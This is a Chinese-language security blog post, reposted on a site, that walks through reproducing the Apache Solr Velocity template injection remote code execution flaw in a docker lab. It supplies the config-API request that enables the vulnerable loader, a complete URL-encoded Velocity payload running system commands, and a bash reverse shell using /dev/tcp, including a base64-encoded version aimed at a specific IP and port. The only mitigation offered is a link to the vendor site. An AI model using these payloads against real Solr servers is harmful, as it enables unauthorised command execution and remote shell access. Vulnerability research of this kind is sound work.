Apache Solr Velocity模板注入RCE漏洞复现

admin 2022年4月6日10:25:28安全文章评论34 views2124字阅读7分4秒阅读模式


0x00简介

Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

0x01漏洞概述

该漏洞的产生是由于两方面的原因:

当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改。

Apache Solr默认集成VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在Solr请求参数中指定模版,默认设置是false。

当设置params.resource.loader.enabled为true时,将允许用户通过设置请求中的参数来指定相关资源的加载,这也就意味着攻击者可以通过构造一个具有威胁的攻击请求,在服务器上进行命令执行。(来自360CERT)

0x02影响版本

Apache Solr 5.x - 8.2.0,存在config API版本

0x03漏洞利用

本次采用8.1.1版本进行复现访问靶机地址:http://192.168.43.186:8983/solr/#/

Apache Solr Velocity模板注入RCE漏洞复现

利用前提:我们需要知道Solr服务中Core的名称,我们首先自己创建一个core

由于漏洞环境由docker搭建,故使用如下命令

docker-compose exec solr bash bin/solr create_core -c test -dexample/example-DIH/solr/db

Apache Solr Velocity模板注入RCE漏洞复现

Apache Solr Velocity模板注入RCE漏洞复现

Apache Solr Velocity模板注入RCE漏洞复现

创建成功后我们查看配置文件地址为http://xx.xx.xx.xx:xxxx/solr/xxxx/config

Apache Solr Velocity模板注入RCE漏洞复现

可见
solr.resource.loader.enabled:false
params.resource.loader.enabled:false
之后我们使用burp抓包修改其配置文件请求方式为POST

{

 "update-queryresponsewriter": {

    "startup":"lazy",

    "name":"velocity",

    "class":"solr.VelocityResponseWriter",

    "template.base.dir":"",

   "solr.resource.loader.enabled": "false",

    "params.resource.loader.enabled":"false"

  }

}

注意:post数据需要为json格式,否则会报500/400的错误

Apache Solr Velocity模板注入RCE漏洞复现

修改后发送数据包,见如下回显说明修改成功

Apache Solr Velocity模板注入RCE漏洞复现

查看配置文件,可见修改成功

Apache Solr Velocity模板注入RCE漏洞复现

现在使用公开的payload进行测试

http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

出现如下回显说明漏洞利用成功

Apache Solr Velocity模板注入RCE漏洞复现

网上已出现poc利用脚本,我们随便找一个去试一试

Apache Solr Velocity模板注入RCE漏洞复现

可见其只能执行简单的命令,甚至无法查看上一层目录

思考如何反弹shell

使用常规的命令进行反弹,但发现会被分割中断,命令如下:

bash -i >&/dev/tcp/ip/port 0>&1

Apache Solr Velocity模板注入RCE漏洞复现

由于Runtime不能使用管道符等bash方法,所以需要进行编码在线编码网站:
http://www.jackson-t.ca/runtime-exec-payloads.html
编码后效果如下

bash -c{echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzQ1LjMyLjIyMy4zMy80NTY3IDA+JjE=}|{base64,-d}|{bash,-i}

Apache Solr Velocity模板注入RCE漏洞复现

依旧不行,但查阅大牛的文章发现确定是通过该种方法进行反弹。问了一圈朋友后确定了问题的原因所在,需要将其他部分进行url编码处理,从而才可以反弹shell。编码后成功反弹shell

Apache Solr Velocity模板注入RCE漏洞复现

0x04漏洞加固

关注官网
http://lucene.apache.org/solr/downloads.html



原文始发于微信公众号(CTS纵横安全实验室):Apache Solr Velocity模板注入RCE漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月6日10:25:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Apache Solr Velocity模板注入RCE漏洞复现 http://cn-sec.com/archives/873565.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: